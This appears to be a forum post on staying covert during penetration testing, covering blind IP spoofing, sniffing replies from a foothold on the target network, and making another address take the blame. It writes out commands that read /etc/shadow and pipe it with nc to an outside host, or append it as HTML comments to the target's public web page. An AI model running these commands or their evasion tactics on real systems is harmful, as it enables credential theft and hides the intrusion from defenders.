So let's look at the realities of being covert, not really "doable" per-se, but accomplishable. In order to understand being/remaining covert it, you need to understand networking for the technical problems and common sense from the penetration testing - I need to get this done, side.
In order not to "get flagged/caught," you need to know that unless you blindly spoof with 100% assurance that your exploit will work on the other side, it's a very difficult almost impossible task to remain 100% invisible.
As many will know, when you spoof tcp/udp/icmp/ip as a whole, you can never see the return information. You were never and will never be, the intended recipient. So this is what occurs for those who are unfamiliar with it:
Me [10.10.10.1] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]
I can perform this all day long and any responses will look like the following to some degree:
attack target's log: 10.25.50.1 DID_SOMETHING ... respond to 10.25.50.1
I can never see the return data going back and forth in that stream unless I was on the 10.25.50.x or th 10.20.30.x network.
Now let's suppose that I had an account somewhere on any one of these networks. Say, 10.20.30.2. Imagine this was an open network in a park somewhere.
Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]
Since I'm on the network, I can turn on a sniffer and depending on how the network is configured, I can see those two hosts responding to one another. (If VLANs aren't properly configured, if I MITMd the router, etc.)
So a potential attack:
Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] --> pretend to be 10.25.50.1 && tcpdump 'ip host 10.20.30.2' -C 1024 -i eth??
This will allow me to see what transpires during this attack. So what can I do? I can blind spoof say an exploit as someone else and watch sniffer output results on the way back and forth. If I see that via sniffing the exploit was successful, I know I can continue blindly spoofing to my heart's content. Because I am not visible, even if detected, I am never blocked, someone else is. Also, I'd positively know that my exploit worked, so that any other host I choose to use is successful. On the way back out, I can create reverse connections in the same manner. (Blindly going on knowing I will successfully go out).
Without getting into too much detail about programs or specific commands, imagine me sending a raw nc out out ANYWHERE:
more /etc/shadow | nc google.com 80
Makes no sense eh? Why not? If sniffing on the network I get to see the output. Obviously Google.com has nothing to do with the shadow file. There is no target to attribute the attack to. I still get what I needed.
more /etc/shadow | sed 's:^:<\!--:g;s:$:-->:g' >> /path/to/target/webserver/index.html
Now the output of the shadow file is an html comment inside of a webpage. You can use a proxy to view the webpage. There are a lot of ways to be covert. BOSH  is also good for stuff like this. So its not about "not being detected" as that is difficult. You will either need to blend in with the crowd, or use blind spoofiing + creativity to overcome being blocked.